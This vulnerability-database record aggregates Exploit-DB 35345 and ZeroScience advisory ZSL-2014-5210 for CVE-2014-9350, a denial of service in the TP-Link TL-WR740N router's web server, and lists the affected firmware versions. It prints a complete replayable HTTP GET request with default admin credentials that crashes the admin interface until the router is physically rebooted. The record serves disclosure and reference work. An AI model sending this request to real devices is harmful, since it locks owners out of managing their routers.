ID

VAR-E-201411-0073


CVE

cve_id:CVE-2014-9350

Trust: 1.6

sources: EXPLOIT-DB: 35345 // EDBNET: 56544

EDB ID

35345


TITLE

TP-Link TL-WR740N - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35345

DESCRIPTION

TP-Link TL-WR740N - Denial of Service. CVE-115017CVE-2014-9350 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35345

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr740nscope: - version: -

Trust: 2.1

sources: PACKETSTORM: 129227 // EXPLOIT-DB: 35345 // EDBNET: 56544

EXPLOIT

TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service

Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us

Affected version:

- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND

Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.

Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.

Tested on: Router Webserver

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php

13.11.2014

---

Replay

GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

Trust: 1.0

sources: EXPLOIT-DB: 35345

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35345

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35345

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 35345 // EDBNET: 56544

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:tcp

Trust: 0.5

sources: PACKETSTORM: 129227

CREDITS

LiquidWorm

Trust: 0.6

sources: EXPLOIT-DB: 35345

EXTERNAL IDS

db:ZSLid:ZSL-2014-5210

Trust: 2.7

db:NVDid:CVE-2014-9350

Trust: 1.6

db:EXPLOIT-DBid:35345

Trust: 1.6

db:EDBNETid:79581

Trust: 0.6

db:EDBNETid:56544

Trust: 0.6

db:PACKETSTORMid:129227

Trust: 0.5

sources: PACKETSTORM: 129227 // EXPLOIT-DB: 35345 // EDBNET: 79581 // EDBNET: 56544

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-9350

Trust: 1.6

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5210.php

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/35345/

Trust: 0.6

sources: EXPLOIT-DB: 35345 // EDBNET: 79581 // EDBNET: 56544

SOURCES

db:PACKETSTORMid:129227
db:EXPLOIT-DBid:35345
db:EDBNETid:79581
db:EDBNETid:56544

LAST UPDATE DATE

2022-07-27T09:18:46.116000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:129227date:2014-11-23T13:03:33
db:EXPLOIT-DBid:35345date:2014-11-24T00:00:00
db:EDBNETid:79581date:2014-11-22T00:00:00
db:EDBNETid:56544date:2014-11-24T00:00:00